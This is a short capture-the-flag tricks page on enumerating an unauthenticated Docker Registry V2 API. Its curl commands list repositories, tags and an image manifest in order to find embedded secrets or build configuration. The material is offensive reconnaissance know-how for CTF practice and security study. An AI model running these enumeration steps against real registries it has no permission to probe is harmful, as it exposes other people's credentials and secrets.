> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-2/enumeration/trick-0029.md).

# Docker Registry API Credential Leak

***

Querying the Docker Registry API (V2) can often reveal valuable information. First, enumerate available repositories by accessing the `_catalog` endpoint:

```bash
curl -X GET http://$VMIP:5000/v2/_catalog
```

Once a repository is identified (e.g., `umbrella/timetracking`), you can enumerate the tags associated with that repository using the `/tags/list` endpoint:

```bash
curl -X GET http://$VMIP:5000/v2/umbrella/timetracking/tags/list
```

After identifying a specific tag (e.g., `latest`), you can attempt to retrieve its manifest to get details about the image layers and potentially embedded secrets or build configuration:

```bash
curl -X GET http://$VMIP:5000/v2/umbrella/timetracking/manifests/latest
```

This can expose sensitive data if the registry is unauthenticated or misconfigured.
